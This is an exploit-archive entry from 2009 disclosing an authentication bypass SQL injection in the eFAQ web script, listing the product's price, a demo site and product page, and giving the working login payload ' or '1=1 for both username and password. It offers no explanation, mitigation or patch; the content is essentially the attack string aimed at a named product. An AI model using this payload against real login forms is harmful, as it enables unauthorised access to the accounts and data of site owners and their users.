id: 4685
date: 01/16/2009
title: eFAQ (Auth Bypass) SQL Injection Vulnerability
author: ByALBAYX
cves: 

==============================================
eFAQ (Auth Bypass) SQL Injection Vulnerability
==============================================


#############################################
[~]Author   : ByALBAYX
#############################################
[~]eFAQ (Auth Bypass) SQL Injection Vulnerability

[~]Script        : eFAQ

[~]Price         : $49.95  save $50.00   :) 

[~]Demo          : http://faq.enthrallweb.us/

[~]eFAQ details  : http://enthrallweb.com/detail.asp?productID=7
#############################################
[~]username  : ' or '1=1

[~]password  : ' or '1=1
#############################################



#  0day.today [2023-03-27]  #